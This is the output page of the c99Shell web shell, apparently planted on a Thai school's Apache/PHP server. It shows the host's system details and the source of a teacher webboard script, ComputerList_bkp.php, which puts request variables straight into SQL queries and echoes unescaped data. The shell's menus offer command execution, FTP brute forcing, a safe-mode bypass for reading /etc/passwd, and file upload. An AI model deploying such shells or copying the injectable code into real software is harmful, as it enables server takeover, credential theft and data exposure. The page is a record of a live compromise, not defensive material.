!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/teacher/   drwxr-xr-x
Free 52.41 GB of 127.8 GB (41.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ComputerList_bkp.php (11.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start();

if ( session_is_registered("valid_user") && session_is_registered("Priority") )
{
	include("../include/FunctionDB.php");
	include("admin_menu.php");
	include("../config.inc.php");
	include("../function.php");
	
	ConnectDB();
	
	$sql = " SELECT * FROM personal_tb WHERE Teacher_code='$Teacher_code' ";
	$res = mysql_query($sql);
	$rss = mysql_fetch_array($res);
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<script type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
<table width="818" border="0" cellpadding="0" cellspacing="0">
	<tr>
		<td><br><fieldset>
			<legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_teac.php?Teacher_code=<? echo $rss[Teacher_code] ?>" >หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="postq.php?Teacher_code=<? echo $rss[Teacher_code] ?>">เพิ่มข้อมูลถึงศูนย์คอมพิวเตอร์</a></font></legend>
			<label><div align="center">
			  <form id="form1" name="form1" method="post" action="">
			    <p align="left"><font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font></p>
		        <table width="654" border="0">
                  <tr>
                    <td width="648"><font size="2" face="MS Sans Serif"><a href="../webboard/postq.php?Category=<? echo $Category; ?>&amp;page=<? echo $page; ?>">
                    <?php
						// table อธิบายความหมายของรูปคำถาม
						///echo"<table width=809 height="36" border=0 align=center">;
						echo "<table width=809 height=36 border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
						echo "<tr><td align=left>\n";
						//echo "\t &nbsp;<img src='../webboard/pic/cam.gif' border=\"0\"> - คำถามที่มีรูป \n";
						echo "\t&nbsp;<img src='../webboard/pic/new2day.gif' border=\"0\"> - คำถามที่มีคนตั้งใหม่วันนี้ \n";
						echo "\t &nbsp;<img src='../webboard/pic/update2day.gif' border=\"0\"> - คำถามที่มีคนตอบวันนี้\n";
						
						echo "</td></tr>\n";
						echo "</table>\n\n";
						echo  "<br>";


						$chk_date = substr(date("Y-m-d H:i:s"),-19,-9);
						
						if ( empty($page) ) {
							$page=1;
						}
					
						// ติดต่อ database เพื่ออ่านข้อมูล	
						// หาจำนวนหน้าทั้งหมด
						//mysql_connect($host,$user,$passwd);
						//mysql_query("SET NAMES 'tis620'");
						$sql = " SELECT No  FROM webboard_data  WHERE Teacher_code='$Teacher_code' ";
						$result = mysql_db_query($dbname,$sql);
						@$NRow = mysql_num_rows($result);
						
						$rt = ($NRow%$list_page);
						if($rt!=0) { 
							$totalpage = floor($NRow/$list_page)+1; 
						}
						else {
							$totalpage = floor($NRow/$list_page); 
						}
						$goto = ($page-1)*$list_page;
					
					
						// Query ข้อมูลตามจำนวนที่กำหนด
						$sql = " SELECT *  FROM webboard_data  WHERE  Teacher_code='$Teacher_code'  ORDER BY No DESC  LIMIT $goto,$list_page ";
						$result = mysql_db_query($dbname,$sql);
						@$NRow = mysql_num_rows($result);
					
						if( $NRow==0 ) { 
							echo "<center>";
							echo "<br>";
							echo "<font size=2 face='MS Sans Serif'>ยังไม่มีคำถาม เมื่อไหร่จะมีน้อ</font><br><br>\n";
							echo "<center>";
						}
						// แสดงหัวข้อของบอร์ด
						else {
							echo "<table  width=809 height=36 border=1 bordercolor=black cellspacing=0 cellpadding=2>\n";
							echo "<tr bgcolor= dodgerblue>\n";
							echo "\t<td align=center width=8%><font size=2 color=#FFF8DC><b>คำถามที่</b></font></td>\n";
							echo "\t<td align=center width=47% ><font size=2 color=#FFF8DC><b>คำถาม-[จำนวนคำตอบ] [จำนวนคนเข้าอ่าน]</b></font></td>\n";
							echo "\t<td align=center width=24%><font size=2 color=#FFF8DC><b>ผู้ถาม[วันที่ถาม]</b></font></td>\n";
							echo "\t<td align=center width=18%><font size=2 color=#FFF8DC><b>ผู้ตอบ[วันที่ตอบ]</b></font></td>\n";
							echo "</tr>\n\n";
					
							// วนลูปแสดงข้อมูลที่อ่านได้
							while ($row = mysql_fetch_array($result)) {
								
								// กำหนดสีของตาราง เพื่อให้มีการสลับสี
								//$bgc = ($bgc=="lightcyan") ? "powderblue" : "lightcyan";
					
								$bgc = ($bgc==$rowColor1) ? $rowColor2 : $rowColor1; 
					
								// กำหนดค่าตัวแปร
								$No = sprintf("%05d",$row["No"]);
								$Question = $row["Question"];
								$Name = $row["Name"];
								$Namer = $row["Namer"];
								$Member = $row["Member"];
								$Memberr = $row["Memberr"];
								$nphoto = $row["nphoto"];
								$ckDate = trim(substr($row["Date"],-19,-9)); // แสดงเฉพาะวันที่
								$Date = convert_date($row["Date"]);
								$Reply = $row["Reply"];
					
								$ckReplyDate = trim(substr($row["ReplyDate"],-19,-9)); 
								$ReplyDate = convert_date($row["ReplyDate"]);
								$pageviewdata = $row["pageview"];
								// แสดงเฉพาะวันที่
								if($Date==$chk_date) {
									echo "<tr bgcolor=$rowHiLight>\n";
								} 
								elseif($ReplyDate==$chk_date) {
									echo "<tr bgcolor=$rowHiLight>\n";	
								} 
								else {
									echo "<tr bgcolor=$bgc>\n";			
								}
								// แสดงรูป folder
								
								////new
									 
								if($Reply>="3" ) {
									echo "\t<td align=center><img src='../webboard/pic/hotfd.gif'> $No</td>\n";
								}
								elseif($ReplyDate!="") {
									echo "\t<td align=center><img src='../webboard/pic/openfd.gif'> $No</td>\n";
								} 
								elseif($Date==$chk_date) {
									echo "\t<td  align=center ><img src='../webboard/pic/newfd.gif'> $No</td>\n";
								} 
								else {
									echo "\t<td align=center><img src='../webboard/pic/closefd.gif'> $No</td>\n";
								}
					
					
								if( ($ckReplyDate==$chk_date) && ($nphoto!='') && ($ckDate==$chk_date) ) {
									echo "\t<td><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
								}
								elseif( ($ckReplyDate==$chk_date) && ($nphoto!='') ) {
									echo "\t<td><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
								}
								elseif( ($ckReplyDate==$chk_date) && ($ckDate==$chk_date) ) {
									echo "\t<td ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
								} 
								elseif( $ckReplyDate==$chk_date ) {
									echo "\t<td  ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>]   [<font color=red> $pageviewdata </font>]</td>\n";
								} 
								elseif( ($nphoto!='') && ($ckDate==$chk_date) ) {
									echo "\t<td ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question </a><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/cam.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
								} 
								elseif($nphoto!='') {
									echo "\t<td ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/cam.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
								} 
								elseif( $ckDate==$chk_date ) {
									echo "\t<td ><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/new2day.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
								} 
								else {
									echo "\t<td><a href='show.php?Teacher_code=$Teacher_code&No=$row[No]' target='$No'>$Question</a>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
								}			
					
								if( $Member ) {
									echo "\t<td>$Name <img src='../webboard/pic/online.gif'> <font color=blue> [$Date]</font></td>\n";
								}
								else {
									echo "\t<td>$Name <font color=blue> [$Date]</font></td>\n";
								}
								
								// ตรวจสอบว่ามีคนตอบคำถามหรือยัง
								if($Memberr) {
									if($ckReplyDate!="" ) {
										echo "\t<td>$Namer <img src='../webboard/pic/online.gif'> <font color=blue>[$ReplyDate]</font></td>\n";
									}
									else {
										echo "\t<td> ยังไม่มีคนตอบ </td>\n";
									}
									echo "</tr>\n\n";
								} else {
									if($ckReplyDate!="" ) {
										echo "\t<td> $Namer <font color=blue>[$ReplyDate]</font></td>\n";
									}
									else {
										echo "\t<td> ยังไม่มีคนตอบ </td>\n";
									}
									echo "</tr>\n\n";
								} # else
							
							} # while
							echo "</table>\n\n";
							
							// table อธิบายความหมายของรูป
							echo "<table  width=809 height=36 border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
							echo "<tr><td align=left>\n";
							echo "\t<img src='../webboard/pic/newfd.gif'> - คำถามใหม่ \n";
							echo "\t<img src='../webboard/pic/closefd.gif'> - คำถามเก่า \n";
							echo "\t<img src='../webboard/pic/openfd.gif'> - คำถามที่ถูกตอบแล้ว\n";
							echo "\t<img src='../webboard/pic/hotfd.gif'> - คำถามที่มีคนตอบมาก\n";
							echo "\t<img src='../webboard/pic/cam.gif'> - คำถามที่มีรูป\n";
							echo "\t<img src='../webboard/pic/online.gif'> - สมาชิกเว็บบอร์ด\n";
							echo "</td></tr>\n";
							echo "</table>\n\n";
					
							// table แสดงเลขหน้า
							echo "<table  width=809 height=36 border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
							echo "<tr><td align=left>\n";
							echo "\t<font size=2 color=#9400D3>\n";
					
							// สร้าง link เพื่อไปหน้าก่อน-หน้าถัดไป
							if($page>1 && $page<=$totalpage) {
								$prevpage = $page-1;
								echo "\t<a href='ComputerList.php?Teacher_code=$Teacher_code&page=$prevpage'>[หน้าก่อน = $prevpage]</a>\n";
							}
					
							echo "\t กำลังแสดงหน้าที่ $page/$totalpage \n";
					
							if($page!=$totalpage) {
								$nextpage = $page+1;
								echo "\t<a href='ComputerList.php?Teacher_code=$Teacher_code&page=$nextpage'>[หน้าถัดไป = $nextpage]</a>\n";
							}
					
							echo "\t</font>\n";
							echo "</td></tr>\n";
							echo "<tr><td>\n";
					
							// วนลูปแสดงเลขหน้าทั้งหมด
							for($i=1 ; $i<$page ; $i++) {
								echo "\t<a href='ComputerList.php?Teacher_code=$Teacher_code&page=$i'>$i</a> \n";
							}
							echo "\t<font size=2 color=red><b>$page</b></font> \n";
							
							for($i=$page+1 ; $i<=$totalpage ; $i++) {
								echo "\t<a href='ComputerList.php?Teacher_code=$Teacher_code&page=$i'>$i</a> \n";
							}
						
							echo "</td></tr>\n";
							echo "</table>\n";
							
						} # else
					?>
                    </a></font></td>
                  </tr>
                </table>
	          </form>
			  </div>
			</label>
		</fieldset><br>
		<font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br>
		</font></td>
	</tr>
</table>
<?php 
	}
else
{
       echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]--